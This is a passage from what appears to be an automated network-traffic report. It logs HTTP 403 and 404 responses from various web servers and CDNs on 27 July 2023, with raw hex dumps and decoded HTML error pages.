                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:42:57 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:42:58 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:42:58 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:42:50 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGEX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: 2925b2a1d9e76ed5cdb21e640b51b6c35438b497Date: Thu, 27 Jul 2023 19:43:01 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 38 34 36 30 22 2c 20 31 36 39 30 34 38 36 39 38 31 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 36 39 38 31 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 33 36 31 33 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 34 35 3a 30 31 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC8460", 1690486981, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690486981 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=20X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 47f11b94-c68a-4187-9841-428a88033890CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=65n5LC%2FRbIkstcPCW1jSIj2x7SL8jQHEUB02kRt72y%2FL4mkh6PGWxU1D%2ByWMqhT0QTVQOVe5XaMexX8iTYX0Swa%2FOSydutzG0KRq%2F6oY5e7jXOlTPBSUnjltvs1PxPweaQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=157.000065Server: cloudflareCF-RAY: 7ed75e74cc4e91d7-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=17X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 6c9e26c1-556b-4704-bdb1-412b74e99327CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lTMlaD3aDY4TZaJbm1EXq4KqGkjjoyblVWZ78%2FhDBpWsdNfrtGZApnelM4mvWpsYvg1W%2FNdZDBvrzPTdjL5kHxiOlu7Wc2eErsT6CM%2F6PvrppEz0Kje%2F4YgKALkGSOs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.000002Server: cloudflareCF-RAY: 7ed75e74db389b31-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:22 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=36G9H3OtGGecN1bs2IUiWUl6J%2F6zvPqS7iyyxMloxlr4qVzybowtnn%2B3Vnfa1jO%2FgySqdaS0Kc%2BSoZRNQRCMJI4awR2CF5iMDcGS7VXcb5Q5So6M1flEHTVq7XudTsec"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75ef6ee6c8fe6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:22 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d5srqqclFWcwn%2Ft%2FPcRrlNzyQQHiJAUL8sA1VWAT1daOTl3%2Bp71rYpZBiy7QFqShIp0Mtsy9RC8SfwfWgxSTWk5iHrUV7T5qsuH24LXjMAbVlEllXzgIYTGoL7JVl1eH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75ef7af3f8fe6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:43:43 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1RoytX%2BWULRNXxMzlGEra2%2BlHVtnT4Lodc1NzWs6d1PHJxFWF9Qx%2Fw65LITg4XjV%2BDppFZogMzYfs7EhTpBtviuz3tSrumig3jClizsIPI8OLGhTOONDolUUpAYOx%2F%2FI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75f1848ac18c3-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</tit
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487008.0724076385219076X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:43:28 GMTX-Served-By: cache-mxp6981-MXPX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4KvxIl911PKpWsWOzhPjUu/,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:28 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:43:29 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:29 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 